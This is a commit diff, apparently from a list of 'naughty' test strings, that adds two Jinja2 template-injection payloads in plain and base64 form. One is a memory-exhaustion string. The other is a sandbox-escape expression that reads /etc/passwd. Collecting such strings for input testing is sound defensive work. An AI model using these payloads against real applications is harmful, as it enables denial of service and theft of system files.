added jinja2 injections

minimaxir · May 18, 2020 · 0d5fd11 · 0d5fd11
1 parent 9c25300
commit 0d5fd11
Show file tree

Hide file tree

Showing 4 changed files with 24 additions and 2 deletions.
diff --git a/blns.base64.json b/blns.base64.json
@@ -671,6 +671,9 @@
   "VGhlIHF1aWMICAgICAhrIGJyb3duIGZvBwcHBwcHBwcHBwd4Li4uIFtCZWVlZXBd", 
   "UG93ZXLZhNmP2YTZj9i12ZHYqNmP2YTZj9mE2LXZkdio2Y/Ysdix2Ysg4KWjIOClo2gg4KWjIOCl", 
   "o+WGlw==", 
-  "2q/ahtm+2pg="
+  "2q/ahtm+2pg=",
+  "eyUgcHJpbnQgJ3gnICogNjQgKiAxMDI0KiozICV9",
+  "e3sgIiIuX19jbGFzc19fLl9fbXJvX19bMl0uX19zdWJjbGFzc2VzX18oKVs0MF0oIi9ldGMvcGFz",
+  "c3dkIikucmVhZCgpIH19"
 ]
 
diff --git a/blns.base64.txt b/blns.base64.txt
@@ -899,3 +899,12 @@ o+WGlw==
 # This is a four characters string which includes Persian special characters (گچپژ)
 
 2q/ahtm+2pg=
+
+# jinja2 injection
+#
+# first one is supposed to raise "MemoryError" exception
+# second, obviously, prints contents of /etc/passwd
+
+eyUgcHJpbnQgJ3gnICogNjQgKiAxMDI0KiozICV9
+e3sgIiIuX19jbGFzc19fLl9fbXJvX19bMl0uX19zdWJjbGFzc2VzX18oKVs0MF0oIi9ldGMvcGFz
+c3dkIikucmVhZCgpIH19
diff --git a/blns.json b/blns.json
@@ -510,5 +510,7 @@
   "Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗", 
   "🏳0🌈️",
   "జ్ఞ‌ా",
-  "گچپژ"
+  "گچپژ",
+  "{% print 'x' * 64 * 1024**3 %}",
+  "{{ \"\".__class__.__mro__[2].__subclasses__()[40](\"/etc/passwd\").read() }}"
 ]
diff --git a/blns.txt b/blns.txt
@@ -731,3 +731,11 @@ Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗
 # This is a four characters string which includes Persian special characters (گچپژ)
 
 گچپژ
+
+# jinja2 injection
+#
+# first one is supposed to raise "MemoryError" exception
+# second, obviously, prints contents of /etc/passwd
+
+{% print 'x' * 64 * 1024**3 %}
+{{ "".__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}